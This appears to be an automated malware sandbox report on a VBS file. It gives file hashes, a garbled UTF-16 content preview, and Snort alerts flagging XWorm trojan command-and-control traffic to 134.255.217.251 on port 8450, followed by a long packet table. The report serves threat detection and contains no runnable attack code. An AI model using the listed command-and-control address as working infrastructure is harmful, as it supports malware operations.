SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
Entropy (8bit):	3.716934834694829
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	72625413524.vbs
File size:	113'810 bytes
MD5:	2112af95545ceb1de9cca9495afc9a05
SHA1:	1f0bcb7572c48c9ffd5bdff0c1afd1ef4afc614d
SHA256:	b8d2261380dd02c1d624dc813bdd2cf294ebe902e3c1405036b690230bd66fb0
SHA512:	52e03cb6cd2c46d88aba6223c44716759fb549c29687ad70b9f9269513bdd5c2c07de5891daf103c21e6cd855b20b46ad12335dcd87c5fee7afedac1075cf8b9
SSDEEP:	3072:gsN2Uqn42YsVWoZiU1DHFUGmgURDFBe0tKl9CP4:4b
TLSH:	C2B3AB0267FA1208F5F77B88A97611740B37BD9AA97DC64C05CC290D1FF3A848825BB7
File Content Preview:	......'.....c.o.n.s.t. .r.e.t.e.s.a.r. . . . . . . . . . .=. .0.....c.o.n.s.t. .k.A.c.t.i.o.n.D.e.l.e.t.e. . . . . . . .=. .1.....c.o.n.s.t. .k.A.c.t.i.o.n.L.i.s.t. . . . . . . . . .=. .2.....c.o.n.s.t. .e.f.e.c.t.u.a.r. . . . . . .=. .3.....c.o.n.s.t. .g

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/23/24-07:55:20.064498	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	8450	49735	134.255.217.251	192.168.2.5
04/23/24-07:53:58.364581	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49735	8450	192.168.2.5	134.255.217.251
04/23/24-07:55:20.064498	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	8450	49735	134.255.217.251	192.168.2.5
04/23/24-07:55:10.823355	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49735	8450	192.168.2.5	134.255.217.251
04/23/24-07:53:35.875260	TCP	2020423	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1	443	49732	116.206.104.215	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 07:53:23.096405983 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.096452951 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.096610069 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.106590033 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.106627941 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.299766064 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.300096989 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.371063948 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.371093035 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.371545076 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.371629000 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.374281883 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.420124054 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.665353060 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.665416002 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.665460110 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.665501118 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.665515900 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.665532112 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.665585995 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.665585995 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.665610075 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.665719032 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.665728092 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.665788889 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.702945948 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.703056097 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.703103065 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.703109026 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.703125954 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.703133106 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.703223944 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.703238964 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:23.703303099 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.703928947 CEST	49728	443	192.168.2.5	172.67.187.200
Apr 23, 2024 07:53:23.703953028 CEST	443	49728	172.67.187.200	192.168.2.5
Apr 23, 2024 07:53:26.842335939 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:26.842381954 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:26.842495918 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:26.851850986 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:26.851878881 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.041548014 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.041635990 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.043824911 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.043844938 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.044116020 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.058603048 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.104129076 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.261703968 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.261744022 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.261770964 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.261804104 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.261832952 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.261877060 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.261941910 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.262119055 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.262162924 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.262171984 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263160944 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263212919 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.263216019 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263231993 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263277054 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.263286114 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263344049 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263386965 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.263392925 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263434887 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263475895 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263479948 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.263489008 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263530970 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.263539076 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263608932 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263648033 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263678074 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.263684034 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263716936 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.263724089 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263900995 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263956070 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.263971090 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.263982058 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.264019966 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.264029026 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.264179945 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.264224052 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.264230967 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.264736891 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.264796019 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.264803886 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.264903069 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.264949083 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.264956951 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.265042067 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.265085936 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.265091896 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.265830994 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.265875101 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.265882969 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.266002893 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.266052008 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.266057968 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.266396999 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.266474009 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.266474009 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.266498089 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.266546965 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.266624928 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.266922951 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.266984940 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.266993046 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.316731930 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.350200891 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.350215912 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.350291014 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.350302935 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.350347996 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.351447105 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.351501942 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.351615906 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.351687908 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.351836920 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.351891994 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.352185965 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.352241993 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.352710009 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.352762938 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.353192091 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.353241920 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.353518009 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.353571892 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.353665113 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.353717089 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.354144096 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.354211092 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.354496002 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.354552984 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.355029106 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.355086088 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.355312109 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.355364084 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.355854988 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.355911016 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.356193066 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.356245041 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.356630087 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.356683016 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.356879950 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.356931925 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.438030005 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.438173056 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.438254118 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.438318968 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.438431025 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.438503981 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.439086914 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.439145088 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.439202070 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.439260006 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.439349890 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.439410925 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.439945936 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.440001965 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.440429926 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.440490961 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.440506935 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.440531969 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.440601110 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.440615892 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.440670013 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.441304922 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.441365957 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.441422939 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.441485882 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.442151070 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.442214966 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.442276955 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.442337036 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.442361116 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.442420959 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.443305969 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.443372011 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.443578005 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.443633080 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.443860054 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.443916082 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.444520950 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.444586992 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.444643974 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.444705963 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.445255995 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.445319891 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.445434093 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.445491076 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.446722984 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.446733952 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.446799994 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.446795940 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.446860075 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.446875095 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.446928978 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.448596954 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.448621035 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.448704004 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.448728085 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.448753119 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.448772907 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.449454069 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.449476004 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.449549913 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.449559927 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.449590921 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.449615002 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.451258898 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.451280117 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.451344013 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.451353073 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.451381922 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.451400042 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.453114986 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.453136921 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.453191996 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.453200102 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.453224897 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.453253984 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.454768896 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.454790115 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.454837084 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.454844952 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.454871893 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.454885960 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.455723047 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.455743074 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.455780983 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.455787897 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.455818892 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.455878973 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.457256079 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.457474947 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.457475901 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.457499981 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.457545042 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.457552910 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.457582951 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.457603931 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.457613945 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.459290981 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.459319115 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.459353924 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.459362030 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.459400892 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.459400892 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.526665926 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.526691914 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.526834011 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.526859999 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.526913881 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.528377056 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.528394938 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.528466940 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.528481960 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.528531075 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.529465914 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.529484034 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.529547930 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.529582024 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.529633999 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.531038046 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.531059980 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.531116962 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.531133890 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.531187057 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.533015013 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.533035994 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.533091068 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.533107042 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.533168077 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.534605026 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.534624100 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.534683943 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.534698963 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.534754038 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.535774946 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.535794973 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.535854101 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.535871029 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.535921097 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.537436008 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.537455082 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.537509918 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.537524939 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.537575960 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.539275885 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.539294004 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.539346933 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.539361954 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.539412975 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.540956020 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.540975094 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.541035891 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.541057110 CEST	443	49729	172.67.215.45	192.168.2.5
